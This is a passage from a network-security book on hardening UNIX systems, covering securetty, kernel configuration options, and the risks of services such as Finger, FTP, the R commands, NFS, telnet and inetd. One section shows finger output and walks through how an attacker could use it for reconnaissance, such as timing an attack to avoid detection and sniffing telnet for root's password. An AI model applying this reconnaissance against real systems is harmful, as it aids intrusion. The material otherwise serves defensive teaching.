flavors of UNIX allow you to limit root’s ability to access the system. Typically, this is done by creating \nentries in the /etc/securetty file. A sample securetty file would be \n[root@thor /etc]# cat securetty \ntty1 \ntty2 \ntty3 \ntty4 \nThe entries within the securetty file identify which interfaces root is allowed to use when accessing the system. \nDirect terminal sessions with the system are identified as tty. This file identifies that root can only gain system \naccess from the first four local consoles. All other connection attempts are rejected. This means that if Deb tries to \ntelnet to the system as root, the logon will be rejected even if she knows the correct password. An example of such \na session would be \nTrying 192.168.1.200 (thor) ... \nConnected to thor.foobar.com \nlogin: root \nPassword: \nLogin incorrect \nlogin: root \nPassword: \nLogin incorrect \nlogin: \n" }, { "page_number": 318, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 318\nAs you can see, there is no visible indication that root is not allowed to access the system via telnet. As far as an \nattacker is concerned, the root password could have been changed. This helps to keep Woolly Attacker from trying \nto come at the system from a different console. \n \n \nOptimizing the UNIX Kernel \nRemoving kernel support for any unneeded services is a great way to further lock down your system. Not only \ndoes this help to optimize system performance, it can improve security, as well. For example, if you will be using \nyour UNIX system as a router or a firewall, you may wish to disable support for source-routed packets. This \nprevents an attacker from using source routing for spoofing or to circumvent the routing table. \nConfiguring a UNIX kernel varies slightly with each implementation. Which options you can configure when \nrebuilding the kernel depend on which options are included by the manufacturer. For the purpose of \ndemonstration, we will be working with Red Hat’s version of Linux. Red Hat supports a number of graphical \nutilities that can be used when rebuilding a UNIX kernel, something that is not available with every platform. \nNote \nLinux by far supports the largest number of configurable options. If you are rebuilding the \nkernel on another UNIX flavor, chances are you will see fewer configurable settings. \nRunning Make \nThe stock Linux kernel is designed to support the lowest common denominators. While this allows it to run on the \nwidest range of systems, it is probably not optimized for your specific configuration. \nTip \nMost distributions install a kernel that is configured to support a 386 processor. \nRecompiling the kernel to match your unique hardware requirements can greatly optimize \nyour system’s performance. \nThere are several commands used in reconfiguring the kernel on a Red Hat Linux system. They are \nƒ \nmake clean or make mrproper \nƒ \nmake config, make menuconfig, or make xconfig \nƒ \nmake dep \nƒ \nmake zImage or make bzImage \nƒ \nmake modules \nƒ \nmake modules_install \nƒ \nmake zlilo or make bzlilo \nYou only need to use one of the three commands listed in the first bullet. The differences are explained below. The \nmake clean command is no longer required, but it will not hurt to run it. All commands should be executed from \nthe /usr/src/linux directory. \nConfiguring the Kernel \nAlways back up your kernel before you start. That way, if something embarrassing happens, you can always fall \nback on your original configuration. The kernel file is /vmlinuz. Simply copy—do not move!—the file to \n/vmlinuz.old. There are three command choices when it comes to selecting the configuration parameters of the \nkernel. They are \nƒ \nmake config \nƒ \nmake menuconfig \nƒ \nmake xconfig \nThe make config command is the oldest and the most familiar command to administrators who are old salts with \nLinux. The make config interface is completely command-line driven. While not very pretty, the make config \ninterface provides default settings that should be fine if left alone. If you do not understand a prompt, do not \nchange it. You can access online Help by typing a question mark in the prompt answer field. The biggest \ndrawback is that you pretty much have to walk through each and every prompt. With the menu utilities, you can \njump in and just change what you need to. Figure 15.1 shows the typical output when a make config is performed. \nTyping make menuconfig enables the ASCII character interface shown in Figure 15.2. Using the arrow keys, you \ncan navigate between menu options. Selecting y for a highlighted option enables support; pressing n disables \nsupport. Some menu items allow you to select m for modular support. This allows the driver to be loaded or \nunloaded as required while the system is running. Pressing h brings up a brief Help menu. \n" }, { "page_number": 319, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 319\nThe make xconfig command is intended to be run from a shell within X-Windows. It is similar to menuconfig, but \nit’s a lot prettier. It is also a bit easier to navigate. Figure 15.3 shows the network section of the xconfig utility. \n \nFigure 15.1: Output of a make config \n \nFigure 15.2: The menu-based kernel configuration screen \n \nFigure 15.3: The X-Windows–based kernel configuration screen \nConfiguration Options \nRegardless of the method you choose, you will need to select which features you wish to enable or disable. Brief \ndescriptions of features related to networking are listed here. \nTip \nFor a more complete list see the online Help and How-To files. \nNetworking Support? This enables networking. If you do not answer \nyes to this prompt, you will not receive any of the other networking \nprompts. The default is yes. \nLimit Memory to Low 16MB? This is provided for older systems that \nhave trouble addressing memory above 16MB. Most systems do not need \n" }, { "page_number": 320, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 320\nthis support. The default is no. \nPCI BIOS Support? This provides support for systems with one or more \nPCI bus slots. Most newer systems support PCI. The default is yes. \nNetwork Firewall? This allows the Linux system to act as a firewall. \nThis option enables firewalling in general, although firewalling for IP is \nthe only protocol supported at this time. This option also needs to be \nenabled if you wish to do IP masquerading. The default is yes. \nNetwork Aliasing? This allows multiple network addresses to be \nassigned to the same interface. Currently, the only supported protocol is \nIP. This is useful if you need to route two logical networks on the same \nphysical segment. This option should be enabled if you plan to use the \nApache Web server in a multihomed capacity. Apache can use the \ndifferent IP addresses assigned to the interface to direct HTTP requests to \ndifferent Web sites running on the machine. The default is yes. \nTCP/IP Networking? This enables or disables IP networking. If you \nwish to use IP to communicate, you should enable this option. The default \nis yes. \nIP: Forwarding/Gateway? This allows the Linux system to forward IP \ntraffic from one interface to another acting as a router. This can be LAN \nto LAN or LAN to WAN. If the Linux box will be providing firewall \nservices, you should disable this option. If you will be using IP \nmasquerading (even if the system will be a firewall as well), you should \nenable this option. The default is yes. \nIP: Multicasting? If you will be using IP multicasting or transmitting \nrouting updates using OSPF, this option should be enabled. The default is \nno. \nIP: Firewalling? This option enables firewall support for the IP protocol. \nThis option should also be enabled if you wish to do IP masquerading or \ntraffic accounting, or to use the transparent proxy. The default answer is \nyes. \nIP: Firewall Packet Logging? When the system is used as a firewall, \nthis option creates a file that logs all passing traffic. It also records what \nthe firewall did with each packet (accept, deny). Logging is a good way to \nkeep an eye on who may be knocking at the front door. I usually enable \nthis option. That way, if you do not need the information you can simply \nclean it out from time to time. The default is no. \nIP: Accounting? When the system acts as a firewall or gateway, this \noption logs all passing traffic. If Linux will be routing on the internal \nnetwork, you may want to disable this option because the log can get quite \nlarge. If Linux will be routing to or firewalling a WAN connection, you \nmay want to enable this option if you wish to keep track of WAN \nutilization. The default is yes. \n" }, { "page_number": 321, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 321\nIP: Optimize as Router Not Host? If the Linux box will be acting \nstrictly as a router, firewall, or proxy, you should enable this option. If the \nsystem will be hosting a HTTP, FTP, DNS, or any other type of service, \nthis option should be disabled. The default is no. \nIP: Tunneling? This enables support for IP encapsulation of IP packets, \nwhich is useful for amateur radio or mobile IP. The default is modular \nsupport, which means you can load it while the system is active if you \nneed it. \nIP: Aliasing Support? This option allows you to assign two or more IP \naddresses to the same interface. Network Aliasing must also be enabled. \nThe default is modular support. \nIP: PC/TCP Compatibility Mode? PC/TCP is a DOS-based IP protocol \nstack. There are some compatibility issues: older versions do not quite \nfollow the same set of communication rules as everyone else. If you have \ntrouble connecting to a Linux system from a host running PC/TCP, enable \nthis option. Otherwise, you should disable this option. The default is no. \nIP: Reverse ARP? This option is typically used by diskless workstations \nto discover their IP addresses. Enabling this option allows the Linux \nsystem to reply to these requests. If you plan to run bootp services, you \nmay want to enable this option in case you need it (either now or later). If \nthe Linux system will not be providing bootp or DHCP services, this \noption can be disabled. The default is modular support. \nIP: Disable Path MTU Discovery? Maximum Transfer Unit (MTU) \nallows a system to discover the largest packet size it may use when \ncommunicating with a remote machine. When MTU is disabled, the \nsystem assumes it must always use the smallest packet size for a given \ntransmission. Because this option can greatly affect communication speed, \nuse MTU unless you run into a compatibility problem. The default is no, \nwhich enables MTU discovery. \nIP: Drop Source Routed Frames? Source routing allows a transmitting \nstation to specify the network path along which replies should be sent. \nThis forces the system replying to the request to transmit along the \nspecified path instead of the one defined by the local routing table. \nNote \nThere is a type of attack where a potential attacker can use source-routed frames to \npretend to be communicating from a host inside your network when the attacker is \nactually located out on the Internet. Source routing is used to direct the frame back out to \nthe Internet, instead of toward the network where the host claims to be located. When \nsource routing is used for this purpose, it is called IP spoofing. \nSome network topologies, such as Token Ring and FDDI, use source \nrouting as part of their regular communications. If the Linux box is \nconnected to one of these token-based topologies, source routing should \nbe enabled. If you are not using these topologies to communicate, this \noption should be disabled to increase security. The default is yes, which \nwill drop all source-routed frames. \nIP: Allow Large Windows? This option increases the transmission \n" }, { "page_number": 322, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 322\nbuffer pool to allow a greater number of frames to be in transit without a \nreply. This is useful when the Linux box is directly connected to a high-\nspeed WAN link (multiple T1s or faster) that connects two sites \nseparated by an extremely large distance (for example, a coast-to-coast \nconnection). The additional buffer space does require additional \nmemory, so this option should only be enabled on systems that meet this \ncriterion and have at least 16MB of physical memory. The default is yes. \nThe IPX Protocol? This option enables support for the IPX protocol. \nYou must answer yes to this prompt in order to configure any IPX \nservices. The default is modular support. \nFull Internal IPX Network? NetWare servers use an internal IPX \nnetwork to communicate between the core OS and different subsystems. \nThis option takes this concept one step further by making the internal \nIPX network a regular network capable of supporting virtual hosts. This \noption is more for development than anything else right now, as it allows \na single Linux system to appear to be multiple NetWare servers. Unless \nyou are doing development work, this option should be disabled. The \ndefault is no. \nAppleTalk DDP? This option enables support for the AppleTalk \nprotocol. When used with the netalk package (Linux support for \nAppleTalk), the Linux system can provide file and printer services to \nMac clients. The default is modular support. \nAmateur Radio AX.25 Level 2? This option is used to support amateur \nradio communications. These communications can be either point to \npoint or through IP encapsulation of IP. The default is no. \nKernel/User Network Link Driver? This option enables \ncommunications between the kernel and user processes designed to \nsupport it. As of this writing, the driver is still experimental and is not \nrequired on a production server. The default is no. \nNetwork Device Support? This option enables driver-level support for \nnetwork communications. You must answer yes to this prompt to enable \nsupport for network cards and WAN communications. The default is \nyes. \nDummy Net Driver Support? This option enables the use of a \nloopback address. Most IP systems understand that transmitting to the IP \naddress 127.0.0.1 will direct the traffic flow back at the system itself. This \noption should be enabled because some applications do use the loopback \naddress. The default is modular support. \nEQL (Serial Line Load Balancing) Support? This option allows \nLinux to balance the network load over two dial-up links. For example, \nyou may be able to call your ISP on two separate lines, doubling your \navailable bandwidth. The default is modular support. \nPLIP (Parallel Port) Support? This option enables support for \n" }, { "page_number": 323, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 323\ncommunication between two systems using a null printer cable. Both \nsystems must use bi-directional parallel ports for communications to be \nsuccessful. This is similar to connecting two systems via the serial ports \nwith a null modem cable, except it supports faster communications. The \ndefault is modular support. \nPPP (Point-to-Point) Support? This option allows the Linux system to \ncreate or accept PPP WAN connections. This should be enabled if you \nplan to use your Linux system to create dial-up connections. The default \nis modular support. \nSLIP (Serial Line) Support? SLIP is the predecessor to PPP. It \nprovides IP connectivity between two systems. Its most popular use is \nfor transferring mail. Because of the additional features provided by \nPPP, SLIP is used very little. The default is to provide modular support. \nRadio Network Interfaces? This option allows the Linux system to \nsupport spread-spectrum communications. Spread spectrum is most \ncommonly used for wireless LAN communications. You must answer \nyes to this prompt in order to receive prompts to configure the radio \ninterface. The default is no. \nEthernet (10 or 100Mbit)? This option allows the Linux system to \ncommunicate using Ethernet network cards. You must answer yes to this \nprompt to select an Ethernet driver later. The default answer is yes. \n3COM Cards? This option allows you to select from a list of supported \n3COM network cards. If you answer no, you will not be prompted with \nany 3COM card options. If you select yes, you will receive further \nprompts allowing you to selectively enable support for each 3COM card \nthat is supported by Linux. \nUpon startup, Linux will attempt to find and auto-detect the setting used \non each network card. The accuracy rate is pretty good, although it does \nsometimes miss on some ISA cards. When you reboot the system, watch \nthe configuration parameters it selects for the card. If these are correct, \nyou’re all set. If they are wrong, you will need to change either the card \nsettings or the configuration parameters. The card is set through the \nconfiguration utility that ships with it. The startup settings can be \nchanged through the Red Hat control panel’s Kernel Daemon \nConfiguration option. The default for this prompt is yes. \nAMD LANCE and PCnet (AT1500 and NE2100)? This is similar to \nthe 3COM prompt, except this option will enable support for AMD and \nPCnet network cards. The default is yes. \nWestern Digital/SMC Cards? This is similar to the 3COM prompt, \nexcept this option will enable support for Western Digital and SMC \nnetwork cards. The default is yes. \nOther ISA Cards? This is similar to the 3COM prompt, except this \noption enables support for some of the more obscure network cards, such \n" }, { "page_number": 324, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 324\nas Cabletron’s E21 series or HP’s 100VG PCLAN. If you select yes, you \nwill receive further prompts allowing you to selectively enable support \nfor a variety of network cards that are supported by Linux. The default is \nyes. \nNE2000/NE1000 Support? This is the generic Ethernet network card \nsupport. If your card has not been specifically listed in any of the \nprevious prompts, enable this option. The default is modular support. \nMost Ethernet network cards are NE2000 compatible, so this prompt is a \nbit of a catchall. \nEISA, VLB, PCI and on Board Controllers? There are a number of \nnetwork cards built directly into the motherboard. If you select yes, you \nwill receive further prompts allowing you to selectively enable support \nfor a variety of built-in network cards that are supported by Linux. The \ndefault answer is yes. \nPocket and Portable Adapters? Linux also supports parallel port \nnetwork adapters. If you select yes, you will receive further prompts \nallowing you to selectively enable support for a variety of parallel port \nnetwork adapters supported by Linux. The default answer is yes. \nToken Ring Driver Support? Linux supports a collection of Token \nRing network adapters. If you select yes, you will receive further \nprompts allowing you to selectively enable support for a variety of \nToken Ring network adapters supported by Linux. The default answer is \nyes. \nFDDI Driver Support? Linux supports a few FDDI network adapters. \nIf you select yes, you will receive further prompts allowing you to \nselectively enable support for different FDDI network cards supported \nby Linux. The default answer is no. \nARCnet Support? ARCnet is an old token-based network topology \nthat is used very little today. If you select yes, you will receive further \nprompts allowing you to selectively enable support for different ARCnet \nnetwork cards supported by Linux. The default support is modular. \nISDN Support? This option enables support for ISDN WAN cards. If \nyou plan to use ISDN, you should also enable the PPP support listed \npreviously. The default support is modular. \nSupport Synchronous PPP? This option provides support for \nsynchronous communications over an ISDN line. Some ISDN hardware \nrequires this to be enabled and will negotiate its use during connection. \nIf you plan to use ISDN, you should enable this option in case you need \nit. The default is yes. \nUse VJ-Compression with Synchronous PPP? This option enables \nheader compression when synchronous PPP is used. The default is yes. \n" }, { "page_number": 325, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 325\nSupport Generic MP (RFC 1717)? When synchronous PPP is used, \nthis option allows communications to take place over multiple ISDN \nlines. Since this is a new specification and not yet widely supported, the \ndefault answer is no. \nSupport Audio via ISDN? When supported by the ISDN card, this \noption allows the Linux system to accept incoming voice calls and act as \nan answering machine. The default answer is no. \nNFS Filesystem Support? This option enables support for mounting \nand exporting file systems using NFS. NFS is most frequently used \nwhen sharing files between UNIX systems; however, it is supported by \nother platforms, as well. The default answer is yes. \nSMB Filesystem Support? This option enables support for NetBIOS/ \nNetBEUI shares. This is most frequently used between Microsoft \nWindows systems for sharing files and printers. The default answer is \nyes. \nSMB Win95 Bug Workaround? This option fixes some connectivity \nproblems when the Linux system attempts to retrieve directory \ninformation from a Windows 95 system that is sharing files. The default \nis no. \nIf you use file sharing for Windows 95, you should enable the SMB \nWin95 Bug Workaround. \nNCP Filesystem Support? This option allows the Linux system to \nconnect to NetWare servers. Once connected, the Linux system can \nmount file systems located on the NetWare server. The default support is \nmodular. \nDependencies Check \nOnce you have finished the configuration, it is now time to run make dep. This command performs a dependencies \ncheck to insure that all required files are present before compiling the kernel. Depending on your system speed, \nthis command could take 1–15 minutes to run. While it is not quite as thrilling as watching grass grow, you should \nkeep an eye on the dependencies check to make sure that there are no errors. \nTip \nErrors are usually in the form of missing files. If you note what is missing, you can go back \nand see where you may have lost it. \nCleaning Up the Work Space \nNext you can run a make clean to insure that any object files get removed. This is typically not required with the \nlatest revision kernels, but it does not hurt to run it just in case. This command usually takes less than one minute \nto execute. \nCompiling the Kernel \nUntil now we have not changed the active system. All our changes have been to configuration files. The next \ncommand, make zImage, will create a kernel with the configuration parameters you selected and replace the one \nyou are currently using. If you receive errors that the kernel is too large (which is common with kernel versions \ngreater than 2.2.x), try make bzImage, which creates a compressed image of the kernel. \nNote \nMake sure you type a capital I in zImage or bzImage. This is important because UNIX \ncommands are case sensitive. \nHow long this command will take to run depends on your processor speed and the amount of physical memory \nthat is installed in the system. A 400MHz Pentium with 128MB of RAM should take 10–20 minutes to create a \nnew kernel. \n" }, { "page_number": 326, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 326\nConfiguring the Boot Manager \nThe last step is to tell Linux’s boot manager LILO that it needs to set pointers for a new image. This is done with \nthe command make zlilo, make bzlilo, or by copying the kernel image to the /boot directory and editing \n/etc/lilo.conf by hand and adding an entry for the new kernel, and rerunning the lilo command. \nYou can now reboot the system and boot off of the new kernel. You should not notice any new errors during \nsystem startup. If you do, or if the system refuses to boot altogether, you can use the emergency recovery disk to \nboot the system and restore the backup kernel we discussed in the “Configuring the Kernel” section of this \nchapter. This will allow you to restart the system so you can figure out what went wrong. \nChanging the Network Driver Settings \nYou may need to change the network driver settings if auto-probe fails to configure them properly. This can be \ndone through the Red Hat Control Panel using the Kernel Daemon Configuration option. Figure 15.4 shows the \nKernel Configurator window, in which you can add, remove, or change the settings of device drivers. \n \nFigure 15.4: The Kernel Configurator \nWhen you highlight a specific driver and select Edit, you will see the Set Module Options dialog box, shown in \nFigure 15.5. This allows you to change the configuration parameters that Linux uses to initialize your network \ncard. Once the changes are complete, you can restart the kernel to have these changes take effect. \n \nFigure 15.5: The Set Module Options window allows you to change the startup parameters for a specific \ndriver. \nYou should now have an optimized kernel, which only includes support for the options you wish to utilize. This \nwill prevent an attacker from accessing any of these services, because support has been removed from the kernel \nitself. To add support back in, an attacker would have to rebuild the system kernel. Most likely, such an event \nwould not go unnoticed. \nTip \nOnce the kernel has been optimized, you should remove any unneeded IP services from the \nmachine, as well. \n \nIP Service Administration \nUNIX has evolved into a system that is capable of supporting many IP services. This is excellent from a \nfunctionality perspective—but not so good for security. Service-rich systems are easier to exploit because the \nchances of finding a vulnerability are greater. For example, someone wishing to attack your UNIX system may \nfind that you have done a good job of locking down HTTP, FTP, and SMTP services but that there is a Finger \nexploit you have missed. \n" }, { "page_number": 327, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 327\nIn the next few sections we will look at the IP services available on most flavors of UNIX and how you can \ndisable the ones you do not need. \nIP Services \nThere are a large number of IP services available for UNIX. The specific flavor of UNIX that you are using will \ndetermine which services are enabled by default. Under each service description, I have noted which services are \ncommonly enabled. You will need to check your specific configuration, however, to see which services you are \nrunning and which ones you are not. \nbootp Server \nThe UNIX bootp server provides bootp and DHCP services to network clients. DHCP and bootp clients can be \nserviced independently or in a mixed environment. The bootp service allows a client to dynamically obtain its IP \naddress and subnet mask. DHCP supports these configuration settings and many others, such as default route, \ndomain name, and so on. Most flavors of UNIX do not ship with a bootp server running. \nDNS Server \nThe domain name server of choice for the UNIX platform is the Berkeley Internet Name Domain (BIND) server. \nBIND is the original, and still the most popular, utility used to exchange domain name information on the Internet. \nA BIND server can be configured to provide primary, secondary, or caching-only domain name services. \nMost UNIX operating systems ship with a local DNS server running. BIND is configured to act as a caching name \nserver by default, unless you specifically configure the system to act as a primary or secondary. As a cache-only \nname server, BIND is still capable of responding to queries on TCP and UDP ports 53. BIND runs as its own \nseparate process called named. \nBIND is infamous for the way in which hackers have exploited it over the years in order to gain access to UNIX \nsystems. Verify that you have the latest version of BIND, and check with CERT (www.cert.org) for the latest \nsecurity information regarding this critical network service. \nFinger Server \nFinger is one of those services that is typically overlooked but can provide a major security hole. UNIX provides \nboth client and server Finger services, which allow you to finger an account by name in order to collect \ninformation about that user. A sample output from a Finger request would be as follows: \n[cbrenton@thor cbrenton]$ finger root@loki.foobar.com \nLogin: root Name: root \nDirectory: /root Shell: /bin/bash \nLast login Sun Aug 30 17:43 (EDT) on ttyp0 from 192.168.1.25 \nNew mail received Mon Aug 31 02:41 1998 (EDT) \n Unread since Mon Aug 31 01:03 1998 (EDT) \nNo Plan. \n[cbrenton@thor cbrenton]$ \nThere are a couple of points worth noting about this output. First, I am running the Finger client from the system \nThor in order to query a user on a remote machine named Loki. Finger is not just for local access but is designed \nfor use over the network. Finger will work on any user within the passwd file, which includes the root user. \nI now know that root has not checked on the system since Sunday, when the root user connected via a telnet \nsession (ttyp0) from 192.168.1.25. If I were considering an attack on this system, I’d now have some great \ninformation to work with: \nƒ \nI can watch how often root checks the system, in order to maximize my chances of \navoiding detection. \nƒ \nI can monitor telnet sessions between Loki and 192.168.1.25 in order to try to capture the \nroot logon password. \nƒ \nOnce I obtain root’s password, I know I will not need physical access to the machine \nbecause root is allowed to authenticate via telnet. \nThis is a pretty hefty amount of information to achieve by simply running a single command. Had the root user \nactually been connected to the system, the output would have appeared similar to the following: \n[cbrenton@thor /etc]$ finger deb \nLogin: deb Name: Deb Tuttle \n" }, { "page_number": 328, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 328\nDirectory: /home/deb Shell: /bin/bash \nOn since Mon Aug 31 13:15 (EDT) on ttyp3 from 192.168.1.32 \n 16 minutes 46 seconds idle \nNo mail. \nNo Plan. \nAs you can see, Deb had an active telnet session from 192.168.1.32 but has not done anything for the last 16 \nminutes and 46 seconds. If I have physical access to Deb’s computer, I may take the long period of inactivity to \nmean that she is away from her desk. This might be a great opportunity for me to walk over and see if there is \nanything interesting in her files. \nFinger runs as a process under inetd, which is discussed later in this chapter. Most flavors of UNIX have Finger \nenabled by default. \nFTP Server \nUNIX provides FTP services, including the ability to service anonymous FTP requests. When someone uses FTP \nto connect to the system and she uses a valid logon name and password, she is dropped into her home directory \nand has her normal level of access to the file system. If, however, someone authenticates using the logon name \nanonymous, she is dropped into a sub-directory (typically /home/ftp) and is not allowed to navigate the system \nabove this point. As far as anonymous FTP users are concerned, /home/ftp is the root-level directory. \nNote \nSubdirectories set up under /home/ftp can allow anonymous users to receive read-only or \nread-write access to files. This is called anonymous FTP access, and it prevents people \nfrom gaining access to the complete file system without proper authentication. \nFTP runs as a process under inetd. While most versions of UNIX ship with the FTP server enabled, not all support \nanonymous FTP access. The most popular version of FTP, wu-ftp, is also notorious for weaknesses that have \nallowed hackers to penetrate systems. Like DNS (above) make sure you have the latest secure version, and verify \nwith CERT that there are no known issues with the version you are running. \nHTTP Server \nMany UNIX systems ship with a Web server called Apache (the most popular Web server to date). Apache \npredominates among UNIX-based Web servers because it supports advanced features such as Java scripting and \nmultihoming. Multihoming is the ability to host multiple domain names on the same Web server. Apache looks at \nthe destination Web server address and directs the query to the appropriate directory structure for that domain. \nHTTP can be a particularly nasty process to leave running because vulnerabilities have been found with some of \nthe older, stock CGI scripts. If you are actively maintaining your server, you have probably updated many of these \nolder scripts already. The situation you should avoid is an HTTP process that has been loaded on the system and \nforgotten about. Web services run as their own separate process called httpd. \nIMAP and POP3 Servers \nUNIX supports remote mail retrieval using both POP3 and IMAP. POP3 is the older standard and is supported by \nmost remote mail clients. IMAP has more features than POP3, but IMAP is just starting to become popular. IMAP \nhas some known vulnerabilities, so make sure that you are running the most current version. \nMost UNIX flavors ship with both POP3 and IMAP services active. Both run as a process under inetd. \nNote \nFor more information on POP3 and IMAP, see Chapter 3. \nlogin and exec \nThese two daemons—login and exec—are referred to as the trusted hosts daemons. This is because they allow \nremote users to access the system without requiring password authentication. The commands that use these \ndaemons are rcp (copy a file to a remote system), rlogin (log on to a remote system), and rsh (execute a command \non a remote system). Collectively, these are known as the R commands. \nTrust is based on security equivalency. When one system trusts another, it believes that all users will be properly \nauthenticated and that an attack will never originate from the trusted system. Unfortunately, this can create a \ndomino effect. All an attacker needs to do is compromise one UNIX machine and then use the trusted host \nequivalency to compromise additional systems. \nTrusted hosts are determined by the contents of the /etc/hosts.equiv file. This file contains a list of trusted systems, \nas you can see in the following example: \nloki.foobar.com \nskylar.foobar.com \npheonix.foobar.com \n" }, { "page_number": 329, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 329\nIf this host.equiv file is located on the system named thor.foobar.com, then Thor will accept login and exec service \nrequests from each of these systems without requiring password authentication. If any other system attempts to \ngain access, the connection request is rejected. \nWarning \nIt is far too easy to exploit the minor level of security provided by the R commands. \nAn attacker can launch a spoof attack or possibly corrupt DNS in order to exploit the \nlack of password security. Both login and exec run as daemons under inetd. It is \nhighly recommended that you disable these services. Using ssh (secure shell) will \nprovide the same functionality but with authenticated and encrypted communications. \nMail Server \nMost flavors of UNIX include Sendmail for processing SMTP traffic. While there are a few other SMTP programs \navailable for UNIX, Sendmail is by far the most popular. At the time of this writing, the current version of \nSendmail is 8.11.2x. Older versions of Sendmail (especially versions prior to 8.0) have many known exploits. If \nyou are running an older version, you should seriously consider updating. \nWarning \nUnfortunately, many UNIX vendors do not stay up to date on Sendmail releases, so it \nis entirely possible that you will install a new OS version, only to find that Sendmail \nis one or two years old. \nMost versions of UNIX ship with Sendmail installed and running. Sendmail runs as its own separate process. The \nname of the daemon is sendmail. \nNews Server \nThe most popular UNIX news server is the InterNetNews daemon (INND). When a UNIX news server is provided \nwith an appropriate feed, remote users can connect to the server to read and post news articles. If no feed is \navailable, the server can be used for intranet discussion groups. \nNews is not included with most UNIX packages. This is mostly due to the amount of resources the typical news \nserver uses. Besides gobs of disk space (8GB to store a few weeks’ worth of articles is not uncommon), an active \nnews server will bring a low-grade processor to its knees. \nTip \nIf you decide to run news, it is a good idea to dedicate a system to the task. \nNFS Server \nUNIX can use NFS to export portions of the server’s file system to NFS clients, or to act as an NFS client itself \nand mount remote file systems. Functionality is similar to NetWare (where you would map a drive letter to a \nsection of the remote file system) or to NT server (where you would map to a share). The difference is that the \nremote NFS file system can be mounted to any point in UNIX client’s file system. \nMost flavors of UNIX that ship with NFS support NFS version 1. The original version of NFS was pretty insecure, \nmostly because it used UDP as a transport. NFS version 2 supports TCP, which helps to make the protocol easier \nto control with static packet filtering. Many UNIX operating systems ship with the NFS server active. Unless you \nspecifically configure it otherwise, no file systems are exported by default. \nUsing NFS is still considered to be a risky venture because packet filtering is easily exploited and overcome by \nany skilled hacker. Consider using NFS only if necessary, and then only behind firewalls. \nSAMBA \nSAMBA is a suite of tools that allow a UNIX machine to act as a session message block (SMB) client or server. \nThis is the same protocol used by Windows systems, which means that a UNIX system running SAMBA is \ncapable of participating in a Windows workgroup or domain (although it cannot act as a PDC or BDC). This \nallows the UNIX machine to share files or printers with Windows systems. \nMost UNIX flavors do not ship with SAMBA pre-installed. The exception to this is Linux. SAMBA is available \nfor free, however, and supports many flavors of UNIX. SAMBA runs its own set of daemons, which are not \ncontrolled by inetd. These daemons are smbd and nmbd. \nTalk \nUNIX supports Talk, which is similar to Internet Relay Chat (IRC). Talk does not require a dedicated server, \nbecause a session is created directly between two UNIX machines. You establish a connection by typing talk \nuser@host.domain. \n" }, { "page_number": 330, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 330\nThe recipient of a Talk request accepts or rejects the connection. Once a connection is established, the screen is \nsplit so that users can type messages simultaneously. Most flavors of UNIX ship with Talk installed and activated. \nTalk is run as a process under inetd. \nBecause modern security philosophy is minimalist, only activate Talk if it is absolutely necessary. Using Talk-like \nclients (thus avoiding the activation of daemons) can achieve the same communication capability. Some examples \ninclude IRC, ICQ, and America Online’s Instant Messenger (AIM). \nTime Server \nUNIX can use the network time protocol (NTP) to both send and receive time synchronization updates. Typically, \none system on the network is set up as a time reference server. This server syncs its time with one of the many \navailable time servers on the Internet. Other systems on the network then check with the reference time server to \ninsure that their system time remains accurate. \nMost flavors of UNIX ship with NTP installed and active. NTP is run as a process under inetd. NTP 3, the most \ncurrent version, can use certificates to verify the identity of reference servers on the network, thereby eliminating \nunknown servers from posing as reference servers. \nNote \nAlthough there are no known direct exploits against NTP, it is possible that an attacker \nmay attempt to propagate bogus time information if you have a security policy that is \nlooser during certain parts of the day. \nTelnet Server \nUNIX can accept telnet requests to provide remote console access to the server. Clients connecting to the system \nthrough telnet have the same abilities as they would have if they were sitting in front of the server console. \nNote \nThis is a powerful feature, so you should plan to take additional steps to limit who has \ntelnet access to your UNIX machines. \nTelnet is supported by all modern versions of UNIX. By default, the telnet server is active. Telnet runs as a \nprocess under inetd. \nAdditional steps taken to secure telnet include limiting the administrative functions that can be performed in a \ntelnet session (including logging in as root), or replacing telnet with ssh (secure shell)—which provides the same \nfunctionality but encrypts the communication (in telnet the username and password are sent over the network \nmedia in clear text). \ninetd \ninetd is the super server that is responsible for monitoring service ports on a UNIX system (starting in Red Hat \nLinux 7 this has been replaced with xinetd, an improved version that provides better security and management). It \nis also responsible for launching the appropriate daemon when a service request is received. inetd uses two files in \norder to determine how to handle service requests: \nservices Identifies the service associated with each port \ninetd.conf Identifies the daemon associated with each service \nThe Services File \nThe services file was discussed at length in Chapter 3, so I will only briefly mention it here. The services file \ncontains a single line entry, which identifies each port that inetd is expected to monitor. For example, the line \nentry for telnet appears as follows: \ntelnet 23/tcp #Provide remote terminal access \nThis tells inetd that any request using TCP as a transport that is received on port 23 is attempting to access the \nservice telnet. Once inetd identifies that a remote user is trying to access telnet, inetd references the inetd.conf file \nto determine how to handle the request. \ninetd.conf \nThe inetd.conf file tells inetd which daemon to launch for a given service request. Here is an example of an \ninetd.conf file: \n# These are standard services. \n# \nftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a \ntelnet stream tcp nowait root /usr/sbin/tcpd in.telnetd \ngopher stream tcp nowait root /usr/sbin/tcpd gn \n#smtp stream tcp nowait root /usr/bin/smtpd smtpd \n#nntp stream tcp nowait root /usr/sbin/tcpd in.nntpd \n" }, { "page_number": 331, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 331\n# \n# Shell, login, exec and talk are BSD protocols. \n# \nshell stream tcp nowait root /usr/sbin/tcpd in.rshd \nlogin stream tcp nowait root /usr/sbin/tcpd in.rlogind \n#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd \ntalk dgram udp wait root /usr/sbin/tcpd in.talkd \nntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd \n#dtalk stream tcp waut nobody /usr/sbin/tcpd in.dtalkd \n# \n# Pop and imap mail services et al \n# \npop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d 